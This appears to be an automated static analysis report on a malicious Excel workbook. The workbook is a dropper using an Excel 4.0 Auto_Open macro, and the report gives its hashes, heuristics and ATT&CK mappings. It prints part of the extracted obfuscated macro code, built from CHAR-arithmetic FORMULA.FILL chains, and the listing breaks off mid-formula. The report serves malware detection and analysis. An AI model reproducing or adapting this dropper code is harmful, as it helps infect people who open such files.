Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d035655c7ad2053e…

MALICIOUS

Office (OLE)

182.5 KB Created: 2020-05-11 08:09:52 Authoring application: Microsoft Excel First seen: 2020-07-24
MD5: d85a001823de7b0ab87f79442c48d630 SHA-1: b0af25be6115429d7281bb6045375335377dcab7 SHA-256: d035655c7ad2053e01020e5561fcb1ebe2fc416fc7888d9c595fea48c815e88c
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file contains Excel 4.0 macros, specifically an Auto_Open macro, which is a known technique for executing malicious code upon opening the workbook. Heuristics indicate the use of dangerous formula APIs like RUN, suggesting the macro is designed to download and execute a secondary payload. ClamAV detection further confirms its malicious nature as a dropper.

Heuristics 4

  • ClamAV: Xls.Dropper.Agent-7790690-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7790690-0
  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 126577 bytes
SHA-256: f5bb920c0340c4b869881a031442b7a920d19e19ccf85de3ace4354e5ce0df60
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!BW14117 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,JM111,"FORMULA.FILL(CHAR(GA46370/EH1672)&CHAR(W33218*IZ31931)&CHAR(GA46370-HN11080)&CHAR(HS34623/IQ11704)&CHAR(JG2129/GC56271)&CHAR(GA46370+FZ36417)&CHAR(JG2129*R1570)&CHAR(CI6472*GX5224)&CHAR(GA46370-DP40723)&CHAR(BN40025*DS15093)&CHAR(CI6472*BS26062)&CHAR(FV26409-JL64697)&CHAR(BN40025/FH37214)&CHAR(W33218-CX17166)&CHAR(W33218/JK4241)&CHAR(FV26409/HI60176)&CHAR(FV26409+HC4786)&CHAR(CI6472*CV26090)&CHAR(BN40025+JH38716)&CHAR(FV26409/IM59397)&CHAR(HS34623/JF32021)&CHAR(BQ20502+HR61947)&CHAR(FV26409*IO18539)&CHAR(CI6472*JR22116)&CHAR(JG2129+HM56917)&CHAR(FV26409/D36733)&CHAR(FV26409-GX31355)&CHAR(CI6472*BO3548)&CHAR(CI6472/JU63408)&CHAR(BN40025-DX57325)&CHAR(JG2129/GM9591)&CHAR(CI6472-HP40415)&CHAR(BQ20502/BE47175)&CHAR(W33218*GG4871)&CHAR(BN40025*HF6396)&CHAR(FV26409*FF37862)&CHAR(HS34623*H5168),FO54580)",""
'  Sheet,BZ112,"",-0.06250000000000000000
'  Sheet,JM112,GOTO(GH39750),""
'  Sheet,HD172,"",4.24175824175824178752
'  Sheet,IG193,"",1663.00000000000000000000
'  Sheet,EZ266,"SET.VALUE(Z43421,-456.00000000000000000000/4*GET.CELL(19,GB61783))",""
'  Sheet,EZ267,GOTO(Y59128),""
'  Sheet,GS267,"",-295.00000000000000000000
'  Sheet,CG292,"",-1.08163165306122466269
'  Sheet,EP300,"",-284.00000000000000000000
'  Sheet,CP367,"",-2.89908256880733938843
'  Sheet,BF378,"",-0.50925925925925930038
'  Sheet,GQ391,"",-0.79104477611940293702
'  Sheet,GX428,"",-0.04821002386634844900
'  Sheet,GP454,"",-2.06097560975609761513
'  Sheet,CD459,"",-3.65178571428571441260
'  Sheet,CO598,"",3.60975609756097570724
'  Sheet,G610,"",1086.00000000000000000000
'  Sheet,BQ626,"",-0.03357438016528925540
'  Sheet,JR641,"",-101.00000000000000000000
'  Sheet,J654,"",0.02834581899169872493
'  Sheet,JM688,"",2.08928571428571441260
'  Sheet,FY737,"",-3.00000000000000000000
'  Sheet,IG780,"",2160.00000000000000000000
'  Sheet,HG782,"",-0.52682926829268295066
'  Sheet,GW813,"",2419.50000000000000000000
'  Sheet,EU816,"",249.00000000000000000000
'  Sheet,CO854,"",-0.02195704057279236274
'  Sheet,IU864,"",28.00000000000000000000
'  Sheet,BE872,"",-0.63888888888888883955
'  Sheet,FL884,"",-35.19999900000000536693
'  Sheet,EY920,"SET.VALUE(IX32121,-352.00000000000000000000/2*GET.CELL(19,GL31139))",""
'  Sheet,EY921,GOTO(GI62685),""
'  Sheet,DX930,"FORMULA.FILL(CHAR(EH31447-EI20285)&CHAR(EH31447*CW17178)&CHAR(BK51427-K39797)&CHAR(FN50710/GJ38558)&CHAR(EH31447+CY8325)&CHAR(HA54251+BE44732)&CHAR(EH31447/IL14163)&CHAR(EH31447*BA36495)&CHAR(BK51427/ID39076)&CHAR(HA54251/IQ22568)&CHAR(EL55098/FH43069)&CHAR(EL55098/IH59732)&CHAR(EN17737-JB23256)&CHAR(IX32121-DA3964)&CHAR(FN50710-EZ49531)&CHAR(Z43421-JP59557)&CHAR(Z43421*DG14684)&CHAR(EH31447/HO38904)&CHAR(HA54251/HJ65066)&CHAR(EH31447-GN1992)&CHAR(IX32121/CP33567)&CHAR(Z43421/JD6236)&CHAR(Z43421*CC29071)&CHAR(IX32121/DF5231)&CHAR(Z43421/BN62736)&CHAR(CP931+HW21240)&CHAR(CP931-GT7810)&CHAR(IU52836/BE33320)&CHAR(CP931-Q40434)&CHAR(HA54251*JA9390)&CHAR(FN50710-DE21197)&CHAR(BK51427*FJ61483)&CHAR(FN50710/GM55549)&CHAR(CP931/EO3541)&CHAR(HA54251*BK48341)&CHAR(FN50710+GG9059)&CHAR(EN17737+GO13915)&CHAR(EL55098+IY48242)&CHAR(EL55098/A39971)&CHAR(Z43421+ER40042)&CHAR(IU52836/CY21950)&CHAR(BK51427-HK23607)&CHAR(FN50710/E61360)&CHAR(EN17737-ER33357)&CHAR(Z43421+Q1579)&CHAR(BK51427+HO5973)&CHAR(EL55098*ES35683)&CHAR(IX32121+JD10324)&CHAR(BK51427-FT9326)&CHAR(IX32121+DF18336)&CHAR(CP931*CI59099)&CHAR(Z43421/HB46361)&CHAR(Z43421*DS30447)&CHAR(EH31447*BZ112)&CHAR(EN17737*GX428)&CHAR(Z43421*GZ53156)&CHAR(IU52836+FC49551)&CHAR(BK51427*Q10915)&CHAR(EL55098+BT28856)&CHAR(EH31447/CD3089)&CHAR(Z43421*GL38657)&CHAR(EN17737/FY4125)&CHAR(BK51427-DC6
... (truncated)